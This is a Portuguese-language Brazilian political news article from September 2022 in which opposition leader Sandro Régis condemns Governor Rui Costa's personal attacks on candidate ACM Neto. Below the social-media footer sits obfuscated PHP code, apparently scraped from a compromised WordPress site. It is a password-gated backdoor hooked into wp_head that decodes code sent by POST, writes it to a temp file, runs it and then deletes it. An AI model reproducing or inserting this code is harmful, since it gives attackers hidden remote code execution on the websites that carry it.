• SEJA BEM-VINDO

Sandro Régis repudia ataques pessoais e familiares de Rui Costa contra ACM Neto: “política baixa, sem espírito republicano”

Publicado em: 05/09/2022 Atualizado:: setembro 5, 2022

 

O deputado Sandro Régis (União Brasil), líder da Oposição na Assembleia Legislativa da Bahia (AL-BA), chamou de “política rasteira” os ataques de ordem pessoal e familiar que o governador Rui Costa (PT) fez nesta segunda-feira (5) contra o candidato a governador ACM Neto (União Brasil).

 

“É lamentável que o governador adote uma postura tão rasteira e pratique uma política tão baixa e desrespeitosa, inclusive partindo para ataques pessoais. Isso tudo é desespero de quem vê se aproximar uma derrota nas urnas. Mais uma vez, faz agressões baixas aos adversários políticos, sem respeito ao jogo democrático e sem espírito republicano”, disse Sandro.

 

Segundo o parlamentar, as declarações do governador fogem à civilidade política e destoam do comportamento institucional que se espera do chefe do Executivo. Visivelmente irritado, Rui Costa fez acusações sem nenhum lastro na verdade dos fatos.

 

“O governador deveria utilizar esse vigor que ele demonstra ao atacar os adversários para combater o crime organizado, para prender a bandidagem. Se assim o fizesse, a Bahia não era hoje o estado com maior número de homicídios no país”, pontuou o líder da Oposição.

 

“Ele sabe também que o candidato dele já mostrou que não tem condição nenhuma de governar a Bahia, afinal de contas foi secretário da Educação e deixou nosso estado no último lugar no país. Por aqui, nós seguiremos fazendo o bom debate político, sem agressividade, sem jogo sujo, fazendo uma campanha propositiva e limpa, focando em trazer soluções para melhorar a vida dos baianos”, emendou Sandro Régis.


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}